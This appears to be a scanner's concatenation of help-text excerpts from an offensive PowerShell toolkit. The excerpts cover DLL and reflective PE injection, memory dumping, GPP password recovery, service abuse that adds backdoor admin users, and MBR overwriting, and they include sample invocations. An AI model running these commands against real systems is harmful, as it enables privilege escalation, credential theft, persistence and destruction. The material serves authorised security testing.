Files:     docs/Recon/Get-ComputerDetail.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-ComputerDetail.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ComputerDetail [-ToString]
 ```
 .
 ## DESCRIPTION
 This script is used to get useful information from a computer.
 Currently, the script gets the following information:
 -Explicit Credential Logons (Event ID 4648)
 -Logon events (Event ID 4624)
 -AppLocker logs to find what processes are created
 -PowerShell logs to find PowerShell scripts which have been executed
 -RDP Client Saved Servers, which indicates what servers the user typically RDP's in to
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ComputerDetail
 ```
 .
 Gets information about the computer and outputs it as PowerShell objects.
 .
 Get-ComputerDetail -ToString
 Gets information about the computer and outputs it as raw text.
 .
 ## PARAMETERS
 .
 ### -ToString
 Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 1
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
 You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
 .
 ## RELATED LINKS
 .
 [Blog: http://clymb3r.wordpress.com/
 Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/
 Github repo: https://github.com/clymb3r/PowerShell)

Files:     docs/Recon/Get-DomainOU.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainOU.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainOU [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]
 [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
 [-Credential <PSCredential>] [-Raw]
 ```
 .
 ## DESCRIPTION
 Builds a directory searcher object using Get-DomainSearcher, builds a custom
 LDAP filter based on targeting/filter parameters, and searches for all objects
 matching the criteria.
 To only return specific properies, use
 "-Properties whencreated,usnchanged,...".
 By default, all OU objects for
 the current domain are returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainOU
 ```
 .
 Returns the current OUs in the domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainOU *admin* -Domain testlab.local
 ```
 .
 Returns all OUs with "admin" in their name in the testlab.local domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
 ```
 .
 Returns all OUs with linked to the specified group policy object.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```
 "*admin*","*server*" | Get-DomainOU
 ```
 .
 Search for OUs with the specific names.
 .
 ### -------------------------- EXAMPLE 5 --------------------------
 ```

Files:     docs/CodeExecution/Invoke-DllInjection.md
Copyright: __NO_COPYRIGHT__ in: docs/CodeExecution/Invoke-DllInjection.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String>
 ```
 .
 ## DESCRIPTION
 Invoke-DllInjection injects a Dll into an arbitrary process.
 It does this by using VirtualAllocEx to allocate memory the size of the
 DLL in the remote process, writing the names of the DLL to load into the
 remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread
 to invoke LoadLibraryA in the context of the remote process.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
 ```
 .
 Description

Files:     CodeExecution/Invoke-ReflectivePEInjection.ps1
Copyright: __NO_COPYRIGHT__ in: CodeExecution/Invoke-ReflectivePEInjection.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
 .
 .PARAMETER PEBytes
 .
 A byte array containing a DLL/EXE to load and execute.
 .
 .PARAMETER ComputerName
 .
 Optional, an array of computernames to run the script on.
 .
 .PARAMETER FuncReturnType
 .
 Optional, the return type of the function being called in the DLL. Default: Void
 Options: String, WString, Void. See notes for more information.
 IMPORTANT: For DLLs being loaded remotely, only Void is supported.
 .
 .PARAMETER ExeArgs
 .
 Optional, arguments to pass to the executable being reflectively loaded.
 .
 .PARAMETER ProcName
 .
 Optional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.
 .
 .PARAMETER ProcId
 .
 Optional, the process ID of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.
 .
 .PARAMETER ForceASLR
 .
 Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even
 if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when
 loading in to a remote process.
 .
 .PARAMETER DoNotZeroMZ
 .
 Optional, will not wipe the MZ from the first two bytes of the PE. This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once.
 .
 .EXAMPLE

Files:     docs/Recon/Invoke-Portscan.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Invoke-Portscan.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### cmdHosts
 ```
 Invoke-Portscan -Hosts <String[]> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]
 [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]
 [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]
 [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]
 [-quiet] [-ForceOverwrite]
 ```
 .
 ### fHosts
 ```
 Invoke-Portscan -HostFile <String> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]
 [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]
 [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]
 [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]
 [-quiet] [-ForceOverwrite]
 ```
 .
 ## DESCRIPTION
 Does a simple port scan using regular sockets, based (pretty) loosely on nmap
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50
 ```
 .
 Description

Files:     docs/Recon/Get-WMIProcess.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-WMIProcess.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-WMIProcess [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION

Files:     docs/Recon/Get-DomainForeignUser.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainForeignUser.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainForeignUser [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Uses Get-DomainUser to enumerate all users for the current (or target) domain,
 then calculates the given user's domain name based on the user's distinguishedName.
 This domain name is compared to the queried domain, and the user object is
 output if they differ.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainForeignUser
 ```
 .
 Return all users in the current domain who are in groups not in the
 current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainForeignUser -Domain dev.testlab.local
 ```
 .
 Return all users in the dev.testlab.local domain who are in groups not in the
 dev.testlab.local domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Privesc/Restore-ServiceBinary.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Restore-ServiceBinary.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Restore-ServiceBinary [-Name] <String> [[-BackupPath] <String>]
 ```
 .
 ## DESCRIPTION
 Takes a service Name or a ServiceProcess.ServiceController on the pipeline and
 checks for the existence of an "OriginalServiceBinary.exe.bak" in the service
 binary location.
 If it exists, the backup binary is restored to the original
 binary path.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Restore-ServiceBinary -Name VulnSVC
 ```
 .
 Restore the original binary for the service 'VulnSVC'.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-Service VulnSVC | Restore-ServiceBinary
 ```
 .
 Restore the original binary for the service 'VulnSVC'.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe'
 ```
 .
 Restore the original binary for the service 'VulnSVC' from a custom location.
 .
 ## PARAMETERS
 .
 ### -Name
 The service name to restore a binary for.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: ServiceName
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -BackupPath
 Optional manual path to the backup binary.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 2
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.ServiceBinary.Installed
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Recon/Invoke-RevertToSelf.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Invoke-RevertToSelf.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-RevertToSelf [[-TokenHandle] <IntPtr>]
 ```
 .
 ## DESCRIPTION
 This function uses RevertToSelf() to revert any impersonated tokens.
 If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
 CloseHandle() is used to close the opened handle.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Recon/Find-DomainLocalGroupMember.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-DomainLocalGroupMember.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Find-DomainLocalGroupMember [[-ComputerName] <String[]>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
 [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-GroupName <String>] [-Method <String>]
 [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
 [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
 ```
 .
 ## DESCRIPTION
 This function enumerates all machines on the current (or specified) domain
 using Get-DomainComputer, and enumerates the members of the specified local
 group (default of Administrators) for each machine using Get-NetLocalGroupMember.
 By default, the API method is used, but this can be modified with '-Method winnt'
 to use the WinNT service provider.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-DomainLocalGroupMember
 ```
 .
 Enumerates the local group memberships for all reachable machines in the current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Find-DomainLocalGroupMember -Domain dev.testlab.local
 ```
 .
 Enumerates the local group memberships for all reachable machines the dev.testlab.local domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     Recon/Get-ComputerDetail.ps1
Copyright: __NO_COPYRIGHT__ in: Recon/Get-ComputerDetail.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 This script is used to get useful information from a computer. Currently, the script gets the following information:
 -Explicit Credential Logons (Event ID 4648)
 -Logon events (Event ID 4624)
 -AppLocker logs to find what processes are created
 -PowerShell logs to find PowerShell scripts which have been executed
 -RDP Client Saved Servers, which indicates what servers the user typically RDP's in to
 .
 .PARAMETER ToString
 .
 Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.
 .
 .EXAMPLE
 .
 Get-ComputerDetail
 Gets information about the computer and outputs it as PowerShell objects.
 .
 Get-ComputerDetail -ToString
 Gets information about the computer and outputs it as raw text.
 .
 .NOTES
 This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
 You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
 .
 .LINK
 .
 Blog: http://clymb3r.wordpress.com/
 Github repo: https://github.com/clymb3r/PowerShell
 .
 #>
 .
 [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
 Param(

Files:     docs/Recon/Find-InterestingFile.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-InterestingFile.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### FileSpecification (Default)
 ```
 Find-InterestingFile [[-Path] <String[]>] [-Include <String[]>] [-LastAccessTime <DateTime>]
 [-LastWriteTime <DateTime>] [-CreationTime <DateTime>] [-ExcludeFolders] [-ExcludeHidden] [-CheckWriteAccess]
 [-Credential <PSCredential>]
 ```
 .
 ### OfficeDocs
 ```
 Find-InterestingFile [[-Path] <String[]>] [-OfficeDocs] [-CheckWriteAccess] [-Credential <PSCredential>]
 ```
 .
 ### FreshEXEs
 ```
 Find-InterestingFile [[-Path] <String[]>] [-FreshEXEs] [-CheckWriteAccess] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function recursively searches a given UNC path for files with
 specific keywords in the name (default of pass, sensitive, secret, admin,
 login and unattend*.xml).
 By default, hidden files/folders are included
 in search results.
 If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection
 is used to temporarily map the remote share.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-InterestingFile -Path "C:\Backup\"
 ```
 .
 Returns any files on the local path C:\Backup\ that have the default
 search term set in the title.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7)
 ```
 .
 Returns any files on the remote path \\\\WINDOWS7\Users\ that have the default
 search term set in the title and were accessed within the last week.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Privesc/Invoke-ServiceAbuse.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Invoke-ServiceAbuse.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-ServiceAbuse [-Name] <String[]> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]
 [-Credential <PSCredential>] [-Command <String>] [-Force]
 ```
 .
 ## DESCRIPTION
 Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current
 user has configuration modification rights on and executes a series of automated actions to
 execute commands as SYSTEM.
 First, the service is enabled if it was set as disabled and the
 original service binary path and configuration state are preserved.
 Then the service is stopped
 and the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a
 series of commands, the service is started, stopped, and the next command is configured.
 After
 completion, the original service configuration is restored and a custom object is returned
 that captures the service abused and commands run.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Invoke-ServiceAbuse -Name VulnSVC
 ```
 .
 Abuses service 'VulnSVC' to add a localuser "john" with password
 "Password123!
 to the  machine and local administrator group
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-Service VulnSVC | Invoke-ServiceAbuse
 ```
 .
 Abuses service 'VulnSVC' to add a localuser "john" with password
 "Password123!
 to the  machine and local administrator group
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john"
 ```
 .
 Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the
 local adminisrtators group.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```
 Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"
 ```
 .
 Abuses service 'VulnSVC' to add a localuser "backdoor" with password
 "password" to the  machine and local "Power Users" group
 .
 ### -------------------------- EXAMPLE 5 --------------------------
 ```
 Invoke-ServiceAbuse -Name VulnSVC -Command "net ..."
 ```
 .
 Abuses service 'VulnSVC' to execute a custom command.
 .
 ## PARAMETERS
 .
 ### -Name
 An array of one or more service names to abuse.
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases: ServiceName
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -UserName
 The \[domain\\\]username to add.
 If not given, it defaults to "john".
 Domain users are not created, only added to the specified localgroup.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: John
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Password
 The password to set for the added user.
 If not given, it defaults to "Password123!"
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: Password123!
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -LocalGroup
 Local group name to add the user to (default of 'Administrators').
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: Administrators
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Credential
 A \[Management.Automation.PSCredential\] object specifying the user/password to add.
 .
 ```yaml
 Type: PSCredential
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: [Management.Automation.PSCredential]::Empty
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Command
 Custom command to execute instead of user creation.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Force
 Switch.
 Force service stopping, even if other services are dependent.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.AbusedService
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Privesc/Install-ServiceBinary.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Install-ServiceBinary.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Install-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]
 [-Credential <PSCredential>] [-Command <String>]
 ```
 .
 ## DESCRIPTION
 Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the
 current user can  modify the associated service binary listed in the binPath.
 Backs up
 the original service binary to "OriginalService.exe.bak" in service binary location,
 and then uses Write-ServiceBinary to create a C# service binary that either adds
 a local administrator user or executes a custom command.
 The new service binary is
 replaced in the original service binary path, and a custom object is returned that
 captures the original and new service binary configuration.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Install-ServiceBinary -Name VulnSVC
 ```

Files:     Exfiltration/Out-Minidump.ps1
Copyright: __NO_COPYRIGHT__ in: Exfiltration/Out-Minidump.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Out-Minidump writes a process dump file with all process memory to disk.
 This is similar to running procdump.exe with the '-ma' switch.
 .
 .PARAMETER Process
 .
 Specifies the process for which a dump will be generated. The process object
 is obtained with Get-Process.
 .
 .PARAMETER DumpFilePath
 .
 Specifies the path where dump files will be written. By default, dump files
 are written to the current working directory. Dump file names take following

Files:     docs/Recon/Get-NetLocalGroup.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-NetLocalGroup.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-NetLocalGroup [[-ComputerName] <String[]>] [-Method <String>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will enumerate the names and descriptions for the
 local groups on the current, or remote, machine.
 By default, the Win32 API
 call NetLocalGroupEnum will be used (for speed).
 Specifying "-Method WinNT"
 causes the WinNT service provider to be used instead, which returns group
 SIDs along with the group names and descriptions/comments.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-NetLocalGroup
 ```
 .
 ComputerName                  GroupName                     Comment

Files:     docs/Mayhem/Set-MasterBootRecord.md
Copyright: __NO_COPYRIGHT__ in: docs/Mayhem/Set-MasterBootRecord.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]
 ```
 .
 ## DESCRIPTION
 Set-MasterBootRecord is proof of concept code designed to show that it is
 possible with PowerShell to overwrite the MBR.
 This technique was taken
 from a public malware sample.
 This script is inteded solely as proof of
 concept code.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
 ```
 .
 ## PARAMETERS
 .
 ### -BootMessage
 Specifies the message that will be displayed upon making your computer a brick.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 1
 Default value: Stop-Crying; Get-NewHardDrive
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -RebootImmediately
 Reboot the machine immediately upon overwriting the MBR.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Force
 Suppress the warning prompt.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -WhatIf
 Shows what would happen if the cmdlet runs.
 The cmdlet is not run.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases: wi
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Confirm
 Prompts you for confirmation before running the cmdlet.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases: cf
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 Obviously, this will only work if you have a master boot record to
 overwrite.
 This won't work if you have a GPT (GUID partition table).

Files:     Recon/Get-HttpStatus.ps1
Copyright: __NO_COPYRIGHT__ in: Recon/Get-HttpStatus.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 A script to check for the existence of a path or file on a webserver.
 .
 .PARAMETER Target
 .
 Specifies the remote web host either by IP or hostname.
 .
 .PARAMETER Path
 .
 Specifies the remost host.
 .
 .PARAMETER Port
 .
 Specifies the port to connect to.
 .
 .PARAMETER UseSSL
 .
 Use an SSL connection.
 .
 .EXAMPLE
 .
 C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
 .
 .EXAMPLE
 .
 C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
 .
 .NOTES
 .
 HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
 .
 .LINK
 .
 http://obscuresecurity.blogspot.com
 http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
 #>
 .
 [CmdletBinding()] Param(

Files:     docs/Recon/New-DomainUser.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/New-DomainUser.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 New-DomainUser [-SamAccountName] <String> [-AccountPassword] <SecureString> [[-Name] <String>]
 [[-DisplayName] <String>] [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]
 ```
 .
 ## DESCRIPTION
 First binds to the specified domain context using Get-PrincipalContext.
 The bound domain context is then used to create a new
 DirectoryServices.AccountManagement.UserPrincipal with the specified user properties.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Recon/ConvertTo-SID.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/ConvertTo-SID.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 ConvertTo-SID [-ObjectName] <String[]> [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Converts a "DOMAIN\username" syntax to a security identifier (SID)
 using System.Security.Principal.NTAccount's translate function.
 If alternate
 credentials are supplied, then Get-ADObject is used to try to map the name
 to a security identifier.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 ConvertTo-SID 'DEV\dfm'
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 'DEV\dfm','DEV\krbtgt' | ConvertTo-SID
 ```
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     Exfiltration/Get-GPPPassword.ps1
Copyright: __NO_COPYRIGHT__ in: Exfiltration/Get-GPPPassword.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
 .
 .PARAMETER Server
 .
 Specify the domain controller to search for.
 Default's to the users current domain
 .
 .PARAMETER SearchForest
 .
 Map all reaschable trusts and search all reachable SYSVOLs.
 .
 .EXAMPLE
 .
 Get-GPPPassword
 .
 NewName   : [BLANK]
 Changed   : {2014-02-21 05:28:53}
 Passwords : {password12}
 UserNames : {test1}
 File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
 .
 NewName   : {mspresenters}
 Changed   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
 Passwords : {Recycling*3ftw!, password123, password1234}
 UserNames : {Administrator (built-in), DummyAccount, dummy2}
 File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
 .
 NewName   : [BLANK]
 Changed   : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
 Passwords : {password, password1234$}
 UserNames : {administrator, admin}
 File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
 .
 NewName   : [BLANK]
 Changed   : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
 Passwords : {password, read123}
 UserNames : {DEMO\Administrator, admin}
 File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
 .
 .EXAMPLE
 .
 Get-GPPPassword -Server EXAMPLE.COM
 .
 NewName   : [BLANK]
 Changed   : {2014-02-21 05:28:53}
 Passwords : {password12}
 UserNames : {test1}
 File      : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml
 .
 NewName   : {mspresenters}
 Changed   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
 Passwords : {Recycling*3ftw!, password123, password1234}
 UserNames : {Administrator (built-in), DummyAccount, dummy2}
 File      : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml
 .
 .EXAMPLE

Files:     docs/Recon/Get-NetRDPSession.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-NetRDPSession.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-NetRDPSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation
 Win32API calls to query a given RDP remote service for active sessions and originating
 IPs.
 This is a replacement for qwinsta.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-NetRDPSession
 ```
 .
 Returns active RDP/terminal sessions on the local host.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-NetRDPSession -ComputerName "sqlserver"
 ```
 .
 Returns active RDP/terminal sessions on the 'sqlserver' host.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainController | Get-NetRDPSession
 ```
 .
 Returns active RDP/terminal sessions on all domain controllers.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Recon/Get-NetSession.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-NetSession.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-NetSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will execute the NetSessionEnum Win32API call to query
 a given host for active sessions.
 .
